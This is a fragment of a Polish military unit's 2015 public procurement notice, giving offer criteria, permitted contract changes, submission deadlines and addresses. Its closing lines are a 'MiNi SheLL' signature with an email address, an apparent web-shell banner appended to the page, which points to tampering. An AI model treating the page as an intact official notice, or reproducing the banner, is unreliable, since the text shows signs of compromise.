<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Okres gwarancji na wykonaną usługę - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany w umowie, w sytuacjach  określonych poniżej
- zmiana miejsca wykonywania usługi,
- zmiana terminu wykonania usługi wynikająca z działania siły wyższej,
- zmiana przepisów prawnych np. VAT,
-zamiana poszczególnego asortymentu, będącego przedmiotem umowy 
i wyszczególnionego w załączniku nr 2 do umowy, a czego nie można było przewidzieć w dniu zawarcia umowy, po uzyskaniu zgody obu stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1bltr.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 50, pok. 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2015 godzina 10:00, miejsce: Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 51,  Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com